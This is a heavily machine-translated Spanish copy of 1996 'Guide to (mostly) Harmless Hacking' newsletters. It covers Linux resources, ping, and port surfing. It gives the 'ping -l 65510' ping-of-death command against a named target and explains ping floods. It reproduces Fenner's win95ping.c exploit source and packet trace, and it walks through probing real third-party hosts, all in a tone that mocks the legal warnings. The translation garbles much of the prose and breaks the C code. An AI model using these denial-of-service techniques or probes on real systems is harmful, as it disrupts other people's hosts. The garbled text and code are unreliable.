pub / Linux / docs en sunsite.unc.edu encontrará una serie de otros documentos sobre Linux, incluyendo Linux INFO-SHEET y META-FAQ, El archivo HOWTO Linux está en el sitio Web sunsite.unc.edu en: / pub / Linux / docs / HOWTO. El directorio / pub / Linux / docs / LDP contiene el conjunto actual de manuales LDP. Usted puede obtener `` Instalación de Linux y Primeros pasos '' en sunsite.unc.edu en / pub / Linux / docs / LDP / install-guía. El archivo README no describe cómo puede solicitar una copia impresa del libro del mismo nombre (alrededor de 180 páginas). Ahora bien, si no te importa conseguir flameado, es posible que desee enviar preguntas a la increíble cantidad de grupos de noticias de Usenet que cubren Linux. Éstas incluyen: comp.os.linux.advocacy Beneficios de Linux compararon
granos comp.os.linux.development.system Linux, controladores de dispositivos servidores Window System comp.os.linux.x Linux X aplicaciones comp.os.linux.apps Escritura Linux Compatibilidad de hardware comp.os.linux.hardware instalación comp.os.linux.setup Linux comp.os.linux.networking Redes y comunicaciones comp.os.linux.answers preguntas frecuentes, cómo-a, archivos LÉAME, etc. linux.redhat.misc alt.os.linux Uso comp.os.linux. * en lugar alt.uu.comp.os.linux.questions Universidad Usenet le ayuda Anuncios comp.os.linux.announce importantes para Linux temas específicos Linux comp.os.linux.misc ¿Deseas que su Linux libre? Tobin Fricke ha señalado que "copias gratuitas de los CD-ROM de Linux están disponibles el sitio web Linux Soporte y CD Givaway en http://emile.math.ucsb.edu:8000/giveaway.html. Este es un proyecto en el que la gente dona CD de Linux que no necesitan nada más. El proyecto fue sembrado por los sistemas Linux Labs, que donó 800 Linux CDs inicialmente! Por favor, recuerde a donar de su Linux CD cuando haya terminado con ellos. Si usted vive cerca de una reunión de intercambio de ordenador, de Fry, Microcentro, u otro lugar, buscan de allí. Por lo general son menos de $ 20, que es una excelente inversión. Personalmente, me gusta Recursos del Linux Desarrollador por Infomagic, que ahora depende de un conjunto de siete CD, creo que Linux CD, que incluye todas las principales distribuciones de Linux (Slackware, RedHat, Debian, Linux para DEC Alpha para nombrar unos pocos), además de espejos de tsx11.mit.edu y sunsite.unc.edu/pub/linux y mucho más. También debe visitar la MARAVILLOSA La página de linux en http://sunsite.unc.edu/linux, que tiene un montón de información, así como la http://www.linux.org/. También puede ser que desee comprobar hacia fuera http://www.redhat.com/ y http://www.caldera.com/ para más información sobre las versiones comerciales de Linux (que todavía están libremente disponibles bajo GNU) ". ¿Qué hay de la seguridad de Linux? Sí, Linux, al igual que todos los sistemas operativos, es imperfecta.Eminentemente hackeable, si realmente quieres saber. Así que si usted quiere saber cómo asegurar su sistema Linux, o si debe venir a través de uno de los muchos proveedores de Internet que utilizan Linux y quiere ir a explorar (perdón, me olvide escribió eso), aquí es donde usted puede ir para obtener información: ftp://info.cert.org/pub/cert_advisories/CA-94:01.network.monitoring.attacks ftp://info.cert.org/pub/tech_tips/root_compromise http://bach.cis.temple.edu/linux/linux-security/ http://www.geek-girl.com/bugtraq/ También hay ayuda para los usuarios de Linux en Internet Relay Chat (IRC). Ben (
[email protected]) alberga un canal llamado #linuxhelp en el servidor IRC Undernet. Por último, pero no menos importante, si usted quiere hacer preguntas de Linux en la lista Happy Hacker, eres bienvenido. Podemos ser el ciego guía a otro ciego, pero lo ¡demonios! ________________________________________
Derechos reservados 1996 Carolyn P. Meinel. Usted puede enviar la GUÍA PARA (casi) Inofensivo HACKING, siempre y cuando salga de este aviso al final. ________________________________________ ____________________________________________________________ GUÍA PARA (casi) Inofensivo HACKING Vol. 2 Número 3 Introducción a TCP / IP. Eso significa que los paquetes! Los datagramas! Ping oversize negación de paquetes de servicio exploit explicó. Pero este hack es mucho menos su mayoría inofensivas que la mayoría. No intente hacer esto en casa ... ____________________________________________________________ Si usted ha estado en la lista Happy Hacker por un tiempo, usted ha estado recibiendo algunos artículos enviados de la lista Bugtraq sobre un nuevo paquete de ping explotan. Ahora bien, si esto ha sido sonando como un galimatías para usted, relájese. Es realmente muy simple. De hecho, es tan simple que si utiliza Windows 95, para el momento de terminar este artículo usted sabrá un simple comando, una línea que se puede utilizar para bloquear muchos servidores de Internet y routers. ************************************************* Usted puede ir a la cárcel ADVERTENCIA: Esta vez no voy a implorar a los tipos genio del mal imitador de esta lista para ser virtuoso y resistir la tentación de hacer mal uso de la información que yo estoy a punto de darles. A ver si me importa! Si uno de esos tipos se ve atrapado estrellarse miles de ordenadores conectados a Internet y routers, no sólo van a ir a la cárcel y obtener un gran bien. Todos vamos a pensar que él o ella es un idiota. Esta explotación es una obviedad, comando de una línea desde Windows 95. Sí, el sistema operativo que está diseñado para imbéciles despistados. Así que no hay nada de élite sobre este hack. ¿Qué es la élite es ser capaz de frustrar este ataque. ************************************************** ************************************************** NEWBIE NOTA: Si los paquetes, los datagramas, y TCP / IP no son exactamente sus amigos del alma, créanme, es necesario conseguir realmente en la cama con ellos con el fin de decir que eres un hacker. Así que aguantar aquí por algunas cuestiones técnicas. Cuando estamos hecho, usted tendrá la satisfacción de saber que podría causar estragos en Internet, pero son demasiado elite para hacerlo. Un paquete es una forma de enviar información por vía electrónica que mantiene la posibilidad de errores. La idea es que ninguna tecnología de transmisión es perfecto. ¿Alguna vez has jugado el juego "teléfono"? Usted recibe una docena de personas en un círculo y la primera persona susurra un mensaje a la segunda. Algo así como "El pan es la forma más baja de trigo." La segunda persona susurra a la tercera, "Un vagabundo es la forma más baja de hacer trampa." Los terceros susurros, "Ron es la forma más baja de beber. "Y así sucesivamente. Es muy divertido para averiguar hasta qué punto el mensaje puede mutar ya que pasa alrededor del círculo. Pero cuando, por ejemplo, se obtiene de correo electrónico, usted prefiere que no está en mal estado. Así que el equipo que envía el correo electrónico lo rompe en pedacitos llamados datagramas. Luego se envuelve cosas alrededor de cada datagrama que le dicen lo que
equipo que necesita para ir a, de dónde viene, y que compruebe si el datagrama podría haber sido mutilado. Estos paquetes de datagramas envueltos son llamados "paquetes". Ahora bien, si la computadora que envía correo electrónico a usted fuera a empaquetar un largo mensaje en un solo paquete, las posibilidades son bastante altas que conseguirá en mal estado, mientras que en su camino hacia el otro equipo. Eructos bits. Así que cuando el equipo receptor comprueba el paquete y encuentra que quedó en mal estado, que se tirarlo a la basura y decir a la otra computadora para enviar de nuevo. Podría tomar un largo tiempo hasta que este paquete gigante recibe a través intacta. Pero si el mensaje se divide en una gran cantidad de pequeños pedazos y envuelto en manojos de paquetes, la mayoría de ellos será bueno y el equipo receptor los mantendrá. A continuación, decirle a la computadora que envía para retransmitir sólo los paquetes que arruinaron. Luego, cuando todas las piezas finalmente llegan allí, el equipo receptor los pone juntos en el orden correcto y he aquí, está el, correo electrónico libre de errores completo. TCP / IP significa Protocolo de Control de Transmisión / Protocolo de Internet. Narra los equipos que están conectados a Internet cómo empaquetar los mensajes en paquetes y cómo leer los paquetes de estos paquetes desde otros ordenadores. Ping utiliza TCP / IP para que sus paquetes. ********************************************** "Ping" es un comando que envía un palpador a cabo desde el ordenador a otro ordenador para ver si está encendido y conectado a la misma red que se encuentra. En Internet hay unos diez millones de ordenadores que puede hacer ping. Ping es un comando que puede dar, por ejemplo, desde la Unix, Windows 95 y sistemas operativos Windows NT.Es parte del Protocolo de mensajes de control de Internet (ICMP), que se utiliza para solucionar problemas de redes TCP / IP. Lo que hace es decirle a un equipo remoto a hacerse eco de vuelta un ping. Así que si tienes tu mesa de ping hacia atrás, usted sabe que la computadora está vivo. Además, algunas formas del comando ping también le dirá cuánto tiempo le toma a un mensaje que salir a ese equipo y volver de nuevo. Pero, ¿cómo el equipo sabe que el ping sólo envió realmente resonó desde el equipo de destino? El datagrama es la respuesta. La mesa de ping envía un datagrama. Si el ping regresar ejerce en este mismo datagrama, sabes que era su tenis que acaba hizo eco de la espalda. El formato básico de este comando es simplemente: de ping nombre de host donde "nombre de host" es la dirección de Internet del equipo que desea revisar. Cuando le doy a este comando desde Sun Release 4.1 Unix, tengo la respuesta "nombre de host está vivo." ************************************** CONSEJO TÉCNICO: Debido a los poderes destructivos de ping, muchos proveedores de servicios Internet esconden el programa ping en sus cuentas de concha, donde los novatos despistados no pueden poner sus manos sobre él. Si su cuenta shell dice "comando no encontrado" cuando se introduce el comando ping, trate de: / usr / etc / ping nombre de host
Si esto no funciona, o bien probar el comando "ping whereis" o se quejan de soporte técnico de su proveedor de Internet. Es posible que hayan ddiabled de ping para los usuarios normales, pero si te convences de soporte técnico eres un buen ciudadano de Internet que pueden dejar de usarlo. *************************************** **************************************** NEWBIE NOTA: Usted dice que no se puede encontrar una manera de hacer ping desde su servicio on-line? Eso puede ser porque usted no tiene una cuenta shell. Pero hay una cosa que realmente necesita para poder hackear: UNA CUENTA SHELL !!!! La razón por hackers se burlan de las personas con cuentas en línea América se debe a que los ISP no dar a conocer las cuentas de concha. Esto se debe a America Online quiere que seas buenos chicos y chicas, y no hackear! Una "cuenta shell" es una cuenta de Internet en el que su ordenador se convierte en un terminal de uno de los equipos host de su ISP. Una vez que estás en la "cáscara" usted puede dar comandos al sistema operativo (que suele ser Unix) justo como si estuviera sentado allí en la consola de uno de los ejércitos de su ISP. Puede que ya tenga una cuenta shell, pero simplemente no saben cómo conectarse a la misma. Apoyo llamada tecnología con su ISP para averiguar si usted tiene uno, y cómo conseguir en él. *************************************** Hay todo tipo de variaciones de lujo en el comando ping. Y, ¿adivinen qué, cada vez que hay un comando que usted da a través de Internet que tiene un montón de variaciones, se puede casi contar con que exista algo hackeable allí. Muhahaha! La mesa de ping inundación es un ejemplo sencillo. Si su sistema operativo le permitirá salirse con dar la orden: -> Ping -f nombre de host envía una verdadera inundación de pings, tan rápido como máquina host de su ISP puede hacerlos. Esto evita que el host que ha orientado tan ocupado haciendo eco de nuevo sus pings que se puede hacer nada más. También pone una carga pesada en la red. Los hackers con los niveles primitivos a veces reunirse y utilizar varios de sus ordenadores a la vez para hacer ping al mismo tiempo la computadora host de Internet de alguna víctima. En general, esto mantendrá el ordenador de la víctima también ocupado como para hacer otra cosa. Incluso puede bloquearse. Sin embargo, el lado negativo (de los atacantes punto de vista) es que mantiene los atacantes ordenadores atados, también. ************************************** NETIQUETTE NOTA: Inundación ping una computadora es extremadamente grosero. Déjate atrapar haciendo esto y usted será afortunado si lo peor que sucede es que su proveedor de servicios en línea cierra su cuenta.Hacer esto para un hacker serio y es posible que necesite un trasplante de identidad. Si usted debe comenzar un ping inundación tipo de por accidente, puede apagarlo, mantenga pulsada la tecla de control y presionando "c" (Ctrl + C). ************************************** *************************************
MAL GENIO TIP: Ping a ti mismo! Si utiliza algún tipo de Unix, el sistema operativo le permitirá utilizar su computadora para hacer casi cualquier cosa que sí que puede hacer a otros equipos. La dirección de red que te lleva de nuevo a su propio equipo host es localhost (o 127.0.0.1). He aquí un ejemplo de cómo utilizo localhost: [65] -> telnet localhost Tratando 127.0.0.1 ... Conectado a localhost. Carácter de escape es '^]'. SunOS UNIX (babosa) iniciar sesión: Mira, yo estoy de vuelta a la secuencia de inicio de sesión para el equipo denominado "babosa" todo de nuevo. Ahora ping a mi mismo: [68] -> / usr / etc / ping localhost localhost está vivo Esto le da el mismo resultado que si yo fuera a comando: [69] -> / usr / etc / ping llama llama.swcp.com está vivo **************************************** ***************************************** Muhahaha CONSEJO: ¿Quieres dar un tirón a la cadena de alguien? Dile a ftp a 127.0.0.1 e inicie sesión utilizando su propio nombre de usuario y contraseña para warez kewl! Mi ex marido Keith Henson hizo eso a la Iglesia de la Cienciología. El COG ftp-ed a 127.0.0.1 y descubrió todos sus escrituras con derechos de autor. Ellos asumido esto fue en el ordenador de Keith, no de ellos. Eran tan * * seguro de que tenía sus escrituras que lo llevaron a los tribunales. El juez, cuando se dio cuenta que estaban simplemente repetirse de nuevo a su propia computadora, literalmente, les rió fuera de los tribunales. Para una transcripción hilarante o cinta de audio de esta sesión de la corte infame, correo electrónico
[email protected]. Esa es la dirección de correo electrónico de Keith. Me quito el sombrero a un excelente pirata! ******************************************* Sin embargo, el paquete de ping oversize exploit que está a punto de aprender lo hará aún más daño a algunos hosts que una banda de conspiradores de ping inundación. Y lo hará sin ocupar equipo de los atacantes por más tiempo que la fracción de segundo que se necesita para enviar sólo un ping. La manera más fácil de hacer este truco es para ejecutar Windows 95. No tenerlo? En general, usted puede encontrar una tienda de El Cheapo que va a vender a usted por $ 99. Para ello, primero configurar su sistema de Windows 95 para que pueda hacer una conexión PPP o SLIP con Internet mediante el programa de Acceso telefónico a redes bajo el icono Mi PC. Es posible que necesite un poco de ayuda de su apoyo ISP tecnología en configurar esto. Debe hacerlo de esta manera o este truco no funcionará.Su America Online dialer * * Definitivamente no va a funcionar. ************************************
NOTA NEWBIE: Si su conexión a Internet le permite ejecutar un navegador web que muestran imágenes, puede utilizar ese número de acceso telefónico con su programa de Windows 95 Acceso telefónico a redes para obtener ya sea una conexión PPP o SLIP. ************************************ A continuación, obtener su conectado a Internet. Pero no ejecute un navegador o cualquier cosa. En cambio, una vez que su programa Acceso telefónico a redes le dirá que usted tiene una conexión, haga clic en el botón "Inicio" y vaya a la lista de "MS-DOS". Abra la ventana de DOS. Usted obtendrá un aviso: C: \ windows \> Ahora vamos a hacer esto primero el buen camino ciudadana. En esta pantalla puede escribir un comando ordinario llanura "ping": C: \ windows \ de ping nombre de host donde "nombre de host" es la dirección de algún equipo de Internet. Por ejemplo, puede hacer ping thales.nmia.com, que es uno de mis equipos favoritos, el nombre de un filósofo griego oscuro. Ahora bien, si usted pasó a conocer la dirección de uno de los ordenadores de Saddam Hussein, sin embargo, es posible que desee dar el comando: c: \ windows \ de ping -l 65510 saddam_hussein's.computer.mil Ahora realmente no hacer esto a un equipo de verdad! Algunos, pero no todos, los ordenadores se bloqueará y, o bien permanecen colgados o reiniciar cuando consiguen este ping. Otros seguirán trabajando alegremente a lo largo, y luego de repente pasar por debajo de horas más tarde. ¿Por qué? Ese extra añadido -l 65510 crea un datagrama gigante para el paquete de ping. Algunos equipos, cuando se le preguntó a devolver un datagrama idénticos, pongo muy mal estado. Si desea que todos los detalles sangrientos en este ping explotan, incluyendo cómo proteger sus ordenadores de ella, echa un vistazo http://www.sophist.demon.co.uk/ping. Ahora bien, hay otras maneras de fabricar un ping datagrama gigante además de utilizar Windows 95. Por ejemplo, si ejecuta ciertas versiones de FreeBSD o Linux de Unix en su PC, puede ejecutar este programa, el cual fue enviado a la lista de Bugtraq. De: Bill Fenner Para: Múltiples destinatarios de la lista BUGTRAQ Asunto: Ping programa de explotar Dado que algunas personas no tienen necesariamente de Windows '95 cajas por ahí, yo (Fenner) escribió lo siguiente hazaña programa. Se requiere una capa de conexión prima que no se metan con el paquete, por lo BSD 4.3, SunOS y Solaris son a cabo. Trabaja muy bien en sistemas 4.4BSD. Se debe trabajar en Linux si compila con -DREALLY_RAW. Siéntase libre de hacer con esto lo que quieres. Utilice esta herramienta sólo para poner a prueba sus propias máquinas, y de no chocar a otros '. * Win95ping.c * * Simular el win95 "ping -l 65510 buggyhost" mal. * Versión 1.0 Bill Fenner 22-Oct-1996 *
* Esto requiere sockets crudos que no ensucia con el paquete del todo (otra * Que la adición de la suma de comprobación). Eso significa que SunOS, Solaris y * Los sistemas basados en BSD4.3 están fuera. Sistemas BSD4.4 (FreeBSD, NetBSD, * OpenBSD, BSDI) funcionará. Linux podría funcionar, yo no tengo un Linux * Sistema de probarlo en. * * El ataque de la caja Win95 se ve así: * 17: 26: 11.013622 cslwin95> arkroyal: icmp: echo petición (frag 6144: 1480 @ 0 +) * 17: 26: 11.015079 cslwin95> arkroyal: (frag 6144: 1480 @ 1480 +) * 17: 26: 11.016637 cslwin95> arkroyal: (frag 6144: 1480 @ 2960 +) * 17: 26: 11.017577 cslwin95> arkroyal: (frag 6144: 1480 @ 4440 +) * 17: 26: 11.018833 cslwin95> arkroyal: (frag 6144: 1480 @ 5920 +) * 17: 26: 11.020112 cslwin95> arkroyal: (frag 6144: 1480 @ 7400 +) * 17: 26: 11.021346 cslwin95> arkroyal: (frag 6144: 1480 @ 8880 + * 17: 26: 11.022641 cslwin95> arkroyal: (frag 6144: 1480 @ 10360 +) * 17: 26: 11.023869 cslwin95> arkroyal: (frag 6144: 1480 @ 11840 +) * 17: 26: 11.025140 cslwin95> arkroyal: (frag 6144: 1480 @ 13320 +) * 17: 26: 11.026604 cslwin95> arkroyal: (frag 6144: 1480 @ 14800 +) * 17: 26: 11.027628 cslwin95> arkroyal: (frag 6144: 1480 @ 16280 +) * 17: 26: 11.028871 cslwin95> arkroyal: (frag 6144: 1480 @ 17760 +) * 17: 26: 11.030100 cslwin95> arkroyal: (frag 6144: 1480 @ 19240 +) * 17: 26: 11.031307 cslwin95> arkroyal: (frag 6144: 1480 @ 20720 +) * 17: 26: 11.032542 cslwin95> arkroyal: (frag 6144: 1480 @ 22200 +) * 17: 26: 11.033774 cslwin95> arkroyal: (frag 6144: 1480 @ 23680 +) * 17: 26: 11.035018 cslwin95> arkroyal: (frag 6144: 1480 @ 25160 +) * 17: 26: 11.036576 cslwin95> arkroyal: (frag 6144: 1480 @ 26640 +) * 17: 26: 11.037464 cslwin95> arkroyal: (frag 6144: 1480 @ 28120 +) * 17: 26: 11.038696 cslwin95> arkroyal: (frag 6144: 1480 @ 29600 +) * 17: 26: 11.039966 cslwin95> arkroyal: (frag 6144: 1480 @ 31080 +) * 17: 26: 11.041218 cslwin95> arkroyal: (frag 6144: 1480 @ 32560 +) * 17: 26: 11.042579 cslwin95> arkroyal: (frag 6144: 1480 @ 34040 +) * 17: 26: 11.043807 cslwin95> arkroyal: (frag 6144: 1480 @ 35520 +) * 17: 26: 11.046276 cslwin95> arkroyal: (frag 6144: 1480 @ 37000 +) * 17: 26: 11.047236 cslwin95> arkroyal: (frag 6144: 1480 @ 38480 +) * 17: 26: 11.048478 cslwin95> arkroyal: (frag 6144: 1480 @ 39960 +) * 17: 26: 11.049698 cslwin95> arkroyal: (frag 6144: 1480 @ 41440 +) * 17: 26: 11.050929 cslwin95> arkroyal: (frag 6144: 1480 @ 42920 +) * 17: 26: 11.052164 cslwin95> arkroyal: (frag 6144: 1480 @ 44400 +) * 17: 26: 11.053398 cslwin95> arkroyal: (frag 6144: 1480 @ 45880 +) * 17: 26: 11.054685 cslwin95> arkroyal: (frag 6144: 1480 @ 47360 +) * 17: 26: 11.056347 cslwin95> arkroyal: (frag 6144: 1480 @ 48840 +) * 17: 26: 11.057313 cslwin95> arkroyal: (frag 6144: 1480 @ 50320 +) * 17: 26: 11.058357 cslwin95> arkroyal: (frag 6144: 1480 @ 51800 +) * 17: 26: 11.059588 cslwin95> arkroyal: (frag 6144: 1480 @ 53280 +) * 17: 26: 11.060787 cslwin95> arkroyal: (frag 6144: 1480 @ 54760 +) * 17: 26: 11.062023 cslwin95> arkroyal: (frag 6144: 1480 @ 56240 +) * 17: 26: 11.063247 cslwin95> arkroyal: (frag 6144: 1480 @ 57720 +)
* 17: 26: 11.064479 cslwin95> arkroyal: (frag 6144: 1480 @ 59200 +) * 17: 26: 11.066252 cslwin95> arkroyal: (frag 6144: 1480 @ 60680 +) * 17: 26: 11.066957 cslwin95> arkroyal: (frag 6144: 1480 @ 62160 +) * 17: 26: 11.068220 cslwin95> arkroyal: (frag 6144: 1480 @ 63640 +) * 17: 26: 11.069107 cslwin95> arkroyal: (frag 6144: 398 @ 65120) * */ #include #include #include #include #include #include #include #include /* * Si su kernel no muck con paquetes primas, REALLY_RAW #define. * Esta es, probablemente, sólo Linux. */ #ifdef REALLY_RAW REVISIÓN #define (x) htons (x) #else REVISIÓN #define (x) (x) #terminara si int main (int argc, char ** argv) { int s; Char buf [1500]; struct ip * ip = buf (struct ip *); struct icmp * icmp = (struct icmp *) (ip + 1); struct hostent * hp; dst sockaddr_in estructura; int desplazamiento; int on = 1; bzero (buf, buf sizeof); if ((s = socket (AF_INET, SOCK_RAW, IPPROTO_IP)) h_addr_list [0], y IP-> ip_dst.s_addr, HP-> h_length); } printf ("Envío a% s \ n", inet_ntoa (IP-> ip_dst)); IP-> ip_v = 4; IP-> ip_hl = sizeof * ip >> 2; IP-> IP_TOS = 0; IP-> ip_len = FIX (buf sizeof); IP-> ip_id = htons (4321); IP-> ip_off = FIX (0); IP-> IP_TTL = 255; IP-> ip_p = 1; IP-> ip_sum = 0; / * Kernel rellena * / IP-> ip_src.s_addr = 0; / * Kernel rellena * / dst.sin_addr = IP-> ip_dst; dst.sin_family = AF_INET; icmp-> ICMP_TYPE = ICMP_ECHO; icmp-> ICMP_CODE = 0; icmp-> icmp_cksum = htons (~ (ICMP_ECHO > 3); si (offset ip_off | = FIX (IP_MF); más IP-> ip_len = FIX (418); / * Hacer total de 65.538 * / si (sendto (s, buf, sizeof buf, 0, (struct sockaddr *) y el horario de verano, dst sizeof) ICMP_TYPE = 0; icmp-> ICMP_CODE = 0; icmp-> icmp_cksum = 0; } } } (Fin de la mesa de ping de Fenner explotar mensaje.) ******************************************** Usted puede ir a la cárcel NOTA: No sólo es este hack no de élite, si usted está leyendo esto usted no sabe lo suficiente para no ser pillado de hacer este ping truco. Por otro lado, si usted fuera a hacerlo a un host de Internet en Irak ... ******************************************** Por supuesto que hay muchas otras cosas kewl que puedes hacer con ping. Si usted tiene una cuenta shell, usted puede encontrar un montón de stuph acerca de ping dando el comando:
hombre de ping De hecho, usted puede conseguir un montón de detalles sobre cualquier comando de Unix con "el hombre". Diviértete con mesa de ping - y ser bueno! Pero recuerda, no estoy pidiendo a los aspirantes a genios malignos que ser bueno. A ver si me importa cuando llegas reventado ... _________________________________________________________ Para suscribirse, correo electrónico
[email protected] con el mensaje "subscribe hh." Para mí, envía un correo electrónico confidencial (por favor, no hay discusión de actividades ilegales) utilizan
[email protected]. Por favor, llamas directos a dev/
[email protected]. Piratería feliz! Derechos reservados 1996 Carolyn P. Meinel. Usted puede enviar la GUÍA PARA (casi) Inofensivo HACKING, siempre y cuando salga de este aviso al final .. ________________________________________________________ ____________________________________________________________ GUÍA PARA (casi) Inofensivo HACKING Vol. 2 Número 4 Más intro de TCP / IP: port surfing! Demonios! ¿Cómo conseguir en casi cualquier ordenador sin necesidad de acceder y sin infringir la ley. Impresiona a tus amigos despistados y en realidad descubren kewl,, stuph seguridad jurídica. ____________________________________________________________ Hace unos días tuve una amiga visitar. Ella es 42 y no posee una computadora. Sin embargo, ella está tomando una clase en computadoras personales en un colegio comunitario. Quería saber lo que todo esto stuph piratería se trata. Así que decidí presentarla al surf puerto. Y mientras lo hace, nos tropezamos con algo kewl. Puerto de surf se aprovecha de la estructura de TCP / IP. Este es el protocolo (conjunto de reglas) que se utiliza para que las computadoras se comuniquen entre sí a través de Internet. Uno de los principios básicos de Unix (el sistema operativo más popular en Internet) es asignar un "puerto" de todas las funciones que un ordenador puede comandar otra para llevar a cabo. Los ejemplos más comunes son para enviar y recibir correo electrónico, leer grupos de noticias Usenet, telnet, transferir archivos y páginas web oferta. ************************ Newbie nota # 1: Un puerto de la computadora es un lugar donde la información va en o fuera de ella. En el ordenador de casa, ejemplos de puertos son el monitor, el cual envía información hacia fuera, el teclado y el ratón, que envía la información, y el módem, el cual envía información tanto fuera y por dentro. Sin embargo, un equipo host de Internet como callisto.unm.edu tiene muchos más puertos que un ordenador personal típico. Estos puertos se identifican por números. Ahora bien, estos no son todos los puertos físicos, como un teclado o un puerto serie RS232 (para el módem). Son (software) puertos virtuales. Un "servicio" es un programa que se ejecuta en un "puerto". Cuando haces telnet a un puerto, que el programa está en marcha, a la espera de su entrada. Piratería feliz! ************************
Así que si quieres leer una página Web, sus contactos navegador número de puerto 80 y le dice al equipo que administra ese sitio web para entrar. Y, por supuesto, te metes en ese equipo servidor Web sin contraseña. OK, gran cosa. Eso es bastante estándar para Internet. Muchos - la mayoría ordenadores en Internet le permitirá hacer algunas cosas con ellos sin necesidad de una contraseña, Sin embargo, la esencia de la piratería está haciendo cosas que no son obvias. Que no sólo saltan a la vista de los manuales. Una forma puede mover un paso adelante respecto a la carrera del usuario de la computadora molino es aprender a puerto surf. La esencia del surf puerto es seleccionar un equipo de destino y explorar para ver qué puertos están abiertos y lo que puede hacer con ellos. Ahora bien, si eres un hacker perezoso puede utilizar herramientas de hackers enlatados como Satán o Netcat.Estos son los programas que se pueden ejecutar desde Linux, FreeBSD o Solaris (todos los tipos de Unix) desde su PC. Ellos buscan automáticamente los equipos de destino. Ellos le dirán qué puertos están en uso. También sondear estos puertos para la presencia de demonios con fallas de seguridad saber, y decirte lo que son. ******************************** Newbie nota # 2: Un demonio no es una especie de grinch o gremlin o 666 tipo. Es un programa que se ejecuta en segundo plano en muchos puertos del sistema (pero no todos) de Unix. Espera a que venga a lo largo y lo utilizan.Si usted encuentra un demonio en un puerto, es probable que sea hackeable. Algunas herramientas de hackers le dirán cuáles son las características hackable son de los demonios que detectan. ******************************** Sin embargo, hay varias razones a los puertos de surf a mano en lugar de forma automática. 1) Usted aprenderá algo. Sondeo manualmente se obtiene una sensación de la tripa de cómo el demonio que se ejecuta en ese puerto se comporta. Es la diferencia entre ver una película porno y (rubor). 2) Usted puede impresionar a sus amigos. Si ejecuta una herramienta de pirateo informático enlatados como Satanás tus amigos te miran y dicen: "Gran cosa. Puedo ejecutar programas, también. "Van a ponerse inmediatamente en el pequeño y sucio secreto del mundo de piratería informática. La mayoría de las hazañas de hacking son sólo lamerz ejecutando programas que recogieron de algunos BBS o sitio ftp. Pero si escribe comandos de pulsaciones de teclas por pulsación de tecla se verá que el uso de su cerebro. Y usted puede ayudar a que jueguen con los demonios, también, y darles una oleada gigante. 3) Los hackers verdaderamente élite navegar puertos y juegan con los demonios con la mano, ya que es la única manera de descubrir algo nuevo. Hay sólo unos pocos cientos de hackers - como máximo - que descubren nueva stuph. El resto simplemente ejecutar hazañas conserva una y otra y otra vez. Boring. Pero te estoy enseñando cómo llegar a la cima del hacker. Ahora déjame decirte lo que mi amigo media edad y yo descubrimos simplemente andar por ahí. En primer lugar, decidimos que no queríamos perder el tiempo jugando con algún pequeño equipo host menor. Hey, vamos a ir para el gran momento! Así que, ¿cómo encontrar un ordenador Kahuna grande en Internet? Empezamos con un dominio que consistía en una LAN de PCs con Linux que se me ocurrió
ya conocer, que es utilizado por el acceso a Internet de Nuevo México ISP: nmia.com. ***************************** Newbie Nota # 3: Un dominio es una dirección de Internet. Se puede utilizar para buscar que dirige los ordenadores utilizados por el dominio, y también para mirar hacia arriba cómo ese dominio está conectado al resto de Internet. ***************************** Así que para hacer esto, primero ingresar con mi cuenta shell con Southwest Cyberport. Le di el comando: [66] -> whois nmia.com Acceso a Internet de Nuevo México (NMIA-DOM) 2201 Buena Vista SE Albuquerque, NM 87106 Nombre de Dominio: NMIA.COM Contacto Administrativo, Técnico Contacto, Zona de Contacto: Orrell, Stan (SO11)
[email protected] (505) 877-0617 Registro de la última actualización 11-Mar-94. Registro creado el 11-Mar-94. Servidores de dominio en orden indicado: NS.NMIA.COM 198.59.166.10 GRANDE.NM.ORG 129.121.1.2 Ahora es una buena apuesta que grande.nm.org está cumpliendo una gran cantidad de otros servidores de Internet junto nmia.com. Así es como nos puerto navegar por nuestra manera de averiguarlo: [67] -> telnet grande.nm.org 15 Tratando 129.121.1.2 ... Conectado a grande.nm.org. Carácter de escape es '^]'. TGV MultiNet V3.5 Rev B, VAX 4000-400, OpenVMS VAX V6.1 Licencia del producto Fecha de Vencimiento de Autorización ---------- ------- ------------- --------------MULTINET Sí A-137-1641 (ninguno) NFS-CLIENTE Sí A-137-113237 (ninguno) *** Configuración de archivo "MULTINET: NETWORK_DEVICES.CONFIGURATION" *** Banderas de dispositivos RSE adaptador Dirección / Vector ------ ------- ----------- -----------SE0 (Compartido VMS Ethernet / FDDI) -ningunos- -ningunosMultiNet Conexiones activas, incluidos los servidores: Proto RCV-Q Snd-Q Dirección Local (Puerto) Dirección de Relaciones Exteriores (Puerto) Estado ----- ----- ----- ------------------ ----------------- - ----TCP 0 822 GRANDE.NM.ORG (NETSTAT) 198.59.115.24 (1569) ESTABLECIDO TCP 0 0 GRANDE.NM.ORG (POP3) 164.64.201.67 (1256) estableció TCP 0 0 GRANDE.NM.ORG (4918) 129.121.254.5 (TELNET) ESTABLECIDO TCP 0 0 GRANDE.NM.ORG (TELNET) AVATAR.NM.ORG (3141) estableció TCP 0 0 * (NameService) * (*) ESCUCHAR
